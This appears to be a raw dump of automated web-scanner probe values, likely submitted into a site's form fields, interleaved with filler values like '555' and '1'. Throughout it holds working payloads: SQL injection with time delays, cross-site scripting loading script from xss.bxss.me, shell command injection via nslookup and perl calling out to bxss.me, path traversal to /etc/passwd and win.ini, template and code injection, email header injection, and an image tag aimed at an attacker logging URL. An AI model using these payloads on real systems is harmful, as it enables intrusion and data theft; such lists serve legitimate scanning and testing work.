;(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")|(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")&(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")
555
555
555
555
555
555
555
${10000457+9999239}
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n979803=v912721
)
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
!(()&&!|*|*|
555
-1 OR 2+738-738-1=0+0+0+1 --
^(#$!@#$)(()))******
555
555
-1 OR 2+950-950-1=0+0+0+1
555
555
Http://bxss.me/t/fit.txt
555
-1' OR 2+289-289-1=0+0+0+1 --
555
http://bxss.me/t/fit.txt?.jpg
-1' OR 2+387-387-1=0+0+0+1 or 'vUEj2D1N'='
/etc/shells
c:/windows/win.ini
-1" OR 2+176-176-1=0+0+0+1 --
bxss.me
555
if(now()=sysdate(),sleep(15),0)
'"()
'.gethostbyname(lc('hityt'.'huhgxcpmb9e13.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(66).chr(121).chr(70).'
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
".gethostbyname(lc("hitta"."uisdwlro1da39.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(73).chr(98).chr(89)."
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
-1; waitfor delay '0:0:15' --
555
555
555
-1); waitfor delay '0:0:15' --
555
-1)); waitfor delay '0:0:15' --
555
1 waitfor delay '0:0:15' --
555
555
jRBBRl1v'; waitfor delay '0:0:15' --
555
555
555
mPslOgeQ'); waitfor delay '0:0:15' --
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
pLss9GDn')); waitfor delay '0:0:15' --
555
555
-5 OR 460=(SELECT 460 FROM PG_SLEEP(15))--
555
';print(md5(31337));$a='
-5) OR 884=(SELECT 884 FROM PG_SLEEP(15))--
HttP://bxss.me/t/xss.html?%00
555
-1)) OR 949=(SELECT 949 FROM PG_SLEEP(15))--
";print(md5(31337));$a="
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(111).concat(72).concat(110).concat(74)+(require"socket"
Socket.gethostbyname("hitck"+"nnpeyfkv70f3c.bxss.me.")[3].to_s)+"
otzPjO8d' OR 588=(SELECT 588 FROM PG_SLEEP(15))--
'+'A'.concat(70-3).concat(22*4).concat(98).concat(70).concat(104).concat(71)+(require'socket'
Socket.gethostbyname('hitdb'+'zmbnarxre9cba.bxss.me.')[3].to_s)+'
555
${@print(md5(31337))}
555
ettTdUx6') OR 283=(SELECT 283 FROM PG_SLEEP(15))--
555
${@print(md5(31337))}\
555
7kg85Oxr')) OR 305=(SELECT 305 FROM PG_SLEEP(15))--
'.print(md5(31337)).'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
555
555
555
555
NewsCommentAdd
555
555
555
555
555
NewsCommentAdd/.
@@nLRqm
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
/xfs.bxss.me
555
555
555
555
555
'"
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<acx><ScRiPt >H1Jo(9014)</ScRiPt>
555
555
'"()&%<acx><ScRiPt >H1Jo(9560)</ScRiPt>
555
555
555
5559484580
555
acu2787<s1﹥s2ʺs3ʹuca2787
555
555
acux2436%C0%BEz1%C0%BCz2a%90bcxuca2436
555
555
<%={{={@{#{${acx}}%>
555
555
<th:t="${acx}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >H1Jo(9646)</ScRiPt>
555<WQXNDD>TRRPK[!+!]</WQXNDD>
555<script>H1Jo(9475)</script>
555<ScR<ScRiPt>IpT>H1Jo(9070)</sCr<ScRiPt>IpT>
555<ScRiPt
>H1Jo(9961)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9440></ScRiPt>
555<isindex type=image src=1 onerror=H1Jo(9269)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9240'>
555<body onload=H1Jo(9616)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=H1Jo(9461)>
555
555
555<img src=xyz OnErRor=H1Jo(9062)>
555
555
555
555<img/src=">" onerror=alert(9510)>
555
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%48%31%4A%6F%289562%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\H1Jo(9154)\u003C/sCripT\u003E
555
555<ScRiPt>H1Jo(9463)</sCripT>
555
%F6<img acu onmouseover=H1Jo(93761) //%F6>
555
555<input autofocus onfocus=H1Jo(9303)>
555
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555
555}body{acu:Expre/**/SSion(H1Jo(9866))}
555
555878Sd
<ScRiPt >H1Jo(9748)</ScRiPt>
555
555<WK7R4E>SW7QX[!+!]</WK7R4E>
555
555<ifRAme sRc=9585.com></IfRamE>
555
555<aGERaKZ x=9086>
555
555<img sRc='http://attacker-9470/log.php?
555<alCwiWK<
555
555
555
555
555
555
555
555
555
1
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
1
555
555'"()&%<acx><ScRiPt >O2EW(9660)</ScRiPt>
555
555
'"()&%<acx><ScRiPt >O2EW(9206)</ScRiPt>
555
555
555
5559651473
555
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
1
555
1
acu8492<s1﹥s2ʺs3ʹuca8492
555
1
response.write(9840564*9649978)
555
'+response.write(9840564*9649978)+'
555
acux9927%C0%BEz1%C0%BCz2a%90bcxuca9927
555
"+response.write(9840564*9649978)+"
1
555
555
1
1
1
555
1
1
555
<%={{={@{#{${acx}}%>
1
wP5sFzPx
1
1
555
<th:t="${acx}#foreach
1
555
1
echo ajtbth$()\ totlpu\nz^xyu||a #' &echo ajtbth$()\ totlpu\nz^xyu||a #|" &echo ajtbth$()\ totlpu\nz^xyu||a #
1
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
1
&echo vczxym$()\ jtblmt\nz^xyu||a #' &echo vczxym$()\ jtblmt\nz^xyu||a #|" &echo vczxym$()\ jtblmt\nz^xyu||a #
|echo bitlqa$()\ wwdqmt\nz^xyu||a #' |echo bitlqa$()\ wwdqmt\nz^xyu||a #|" |echo bitlqa$()\ wwdqmt\nz^xyu||a #
1
555
555
../../../../../../../../../../../../../../etc/passwd
(nslookup hitmsbqkuaduod878d.bxss.me||perl -e "gethostbyname('hitmsbqkuaduod878d.bxss.me')")
acx{{98991*97996}}xca
../../../../../../../../../../../../../../windows/win.ini
$(nslookup hitgvkhqhyilne4e53.bxss.me||perl -e "gethostbyname('hitgvkhqhyilne4e53.bxss.me')")
&(nslookup hitdlhydzxrcwe2757.bxss.me||perl -e "gethostbyname('hitdlhydzxrcwe2757.bxss.me')")&'\"`0&(nslookup hitdlhydzxrcwe2757.bxss.me||perl -e "gethostbyname('hitdlhydzxrcwe2757.bxss.me')")&`'
555
|(nslookup hititoxptdaur3b591.bxss.me||perl -e "gethostbyname('hititoxptdaur3b591.bxss.me')")
1
1
../1
acx[[${98991*97996}]]xca
`(nslookup hitezdeaukdze7805d.bxss.me||perl -e "gethostbyname('hitezdeaukdze7805d.bxss.me')")`
1
;(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")|(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")&(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")
1%0abcc:009247.6274-2479.6274.7276b.20044.2@bxss.me
to@example.com>%0d%0abcc:009247.6274-2480.6274.7276b.20044.2@bxss.me
555
1
acx__${98991*97996}__::.x
1
1<esi:include src="http://bxss.me/rpb.png"/>
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
1
${9999233+9999891}
555
555<ScRiPt >O2EW(9105)</ScRiPt>
1
1
1
1&n957445=v994643
555<WYPWH0>GINEL[!+!]</WYPWH0>
1
555
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
1
1
555
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
1
555
Http://bxss.me/t/fit.txt
555<script>O2EW(9961)</script>
http://bxss.me/t/fit.txt%3F.jpg
1
/etc/shells
c:/windows/win.ini
555
555<ScR<ScRiPt>IpT>O2EW(9756)</sCr<ScRiPt>IpT>
1
1
bxss.me
1
555<ScRiPt
>O2EW(9047)</ScRiPt>
555
1
1
1
1
555
1
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9009></ScRiPt>
1
1
555
1
555<isindex type=image src=1 onerror=O2EW(9963)>
555
1
1
1
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9201'>
555
1
555<body onload=O2EW(9855)>
555
1
555<img src=//xss.bxss.me/t/dot.gif onload=O2EW(9877)>
555
1
555
1
555<img src=xyz OnErRor=O2EW(9794)>
1
1
555
1
555<img/src=">" onerror=alert(9643)>
1
555
1
%35%35%35%3C%53%63%52%69%50%74%20%3E%4F%32%45%57%289185%29%3C%2F%73%43%72%69%70%54%3E
555
1
-1 OR 2+675-675-1=0+0+0+1 --
555\u003CScRiPt\O2EW(9809)\u003C/sCripT\u003E
-1 OR 2+632-632-1=0+0+0+1
-1' OR 2+209-209-1=0+0+0+1 --
555
-1' OR 2+959-959-1=0+0+0+1 or '7GgYMdXh'='
-1" OR 2+761-761-1=0+0+0+1 --
555<ScRiPt>O2EW(9452)</sCripT>
if(now()=sysdate(),sleep(15),0)
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
%F6<img acu onmouseover=O2EW(94181) //%F6>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555<input autofocus onfocus=O2EW(9207)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
<a HrEF=http://xss.bxss.me></a>
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
555
-1)); waitfor delay '0:0:15' --
<a HrEF=jaVaScRiPT:>
1 waitfor delay '0:0:15' --
555
1
555}body{acu:Expre/**/SSion(O2EW(9534))}
zCGOZ2gn'; waitfor delay '0:0:15' --
NEqwyXKJ'); waitfor delay '0:0:15' --
1
1
1
1
555
'.gethostbyname(lc('hitgq'.'unnaiwtx6371b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(70).chr(100).chr(81).'
)
555ASfoi
<ScRiPt >O2EW(9205)</ScRiPt>
!(()&&!|*|*|
".gethostbyname(lc("hitfr"."vuaecpksd42b5.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(66).chr(106).chr(79)."
^(#$!@#$)(()))******
555
mWIi9k5c')); waitfor delay '0:0:15' --
555<WVKPBR>78NES[!+!]</WVKPBR>
1
-5 OR 116=(SELECT 116 FROM PG_SLEEP(15))--
-5) OR 798=(SELECT 798 FROM PG_SLEEP(15))--
1
1
555
-1)) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
1
1
HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(114).concat(89).concat(119).concat(87)+(require"socket"
Socket.gethostbyname("hitto"+"ognqhqaq6d6e9.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
555<ifRAme sRc=9318.com></IfRamE>
'+'A'.concat(70-3).concat(22*4).concat(117).concat(80).concat(109).concat(72)+(require'socket'
Socket.gethostbyname('hityf'+'bqkodnzke671f.bxss.me.')[3].to_s)+'
555
1
6y1pqOkL' OR 561=(SELECT 561 FROM PG_SLEEP(15))--
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
ehYb3OBc') OR 640=(SELECT 640 FROM PG_SLEEP(15))--
bD52rgex')) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
1
555<aueTxOp x=9458>
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
/xfs.bxss.me
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
1
${@print(md5(31337))}\
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'.print(md5(31337)).'
1
555<img sRc='http://attacker-9147/log.php?
'"
1'"
1 ����%2527%2522
555'"()&%<acx><ScRiPt >tNit(9896)</ScRiPt>
<!--
@@Bw8qZ
1
1
1
'"()&%<acx><ScRiPt >tNit(9321)</ScRiPt>
555<ac3VwzI<
1
1
5559261877
1
1
1
1
1
acu4567<s1﹥s2ʺs3ʹuca4567
1
1
acux10538%C0%BEz1%C0%BCz2a%90bcxuca10538
1
1
<%={{={@{#{${acx}}%>
1
<th:t="${acx}#foreach
1
1
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
1
1
acx{{98991*97996}}xca
1
1
acx[[${98991*97996}]]xca
1
1
acx__${98991*97996}__::.x
1
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
555<ScRiPt >tNit(9604)</ScRiPt>
1
1
1
555<WCFYSY>L1NJH[!+!]</WCFYSY>
1
555<script>tNit(9533)</script>
1
1
555<ScR<ScRiPt>IpT>tNit(9093)</sCr<ScRiPt>IpT>
1
555<ScRiPt
>tNit(9728)</ScRiPt>
1
1
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9148></ScRiPt>
1
555<isindex type=image src=1 onerror=tNit(9077)>
1
1
1
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9167'>
1
1
1
555<body onload=tNit(9076)>
1'"()&%<acx><ScRiPt >vayX(9040)</ScRiPt>
'"()&%<acx><ScRiPt >vayX(9313)</ScRiPt>
555<img src=//xss.bxss.me/t/dot.gif onload=tNit(9177)>
19697956
555<img src=xyz OnErRor=tNit(9623)>
acu1461%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1461
acux9388%C0%BEz1%C0%BCz2a%90bcxuca9388
<%={{={@{#{${acx}}%>
555<img/src=">" onerror=alert(9681)>
1
<th:t="${acx}#foreach
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%4E%69%74%289053%29%3C%2F%73%43%72%69%70%54%3E
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555'"()&%<acx><ScRiPt >AMWP(9796)</ScRiPt>
555\u003CScRiPt\tNit(9928)\u003C/sCripT\u003E
'"()&%<acx><ScRiPt >AMWP(9151)</ScRiPt>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
555<ScRiPt>tNit(9452)</sCripT>
5559649437
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1<ScRiPt >vayX(9877)</ScRiPt>
%F6<img acu onmouseover=tNit(99181) //%F6>
555
1<WIASB2>JA4DD[!+!]</WIASB2>
acu9178<s1﹥s2ʺs3ʹuca9178
1<script>vayX(9276)</script>
555<input autofocus onfocus=tNit(9494)>
acux5927%C0%BEz1%C0%BCz2a%90bcxuca5927
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%76%61%79%58%28%39%39%34%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
555
<a HrEF=http://xss.bxss.me></a>
1<ScRiPt
>vayX(9405)</ScRiPt>
<%={{={@{#{${acx}}%>
555
<a HrEF=jaVaScRiPT:>
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9056></ScRiPt>
1<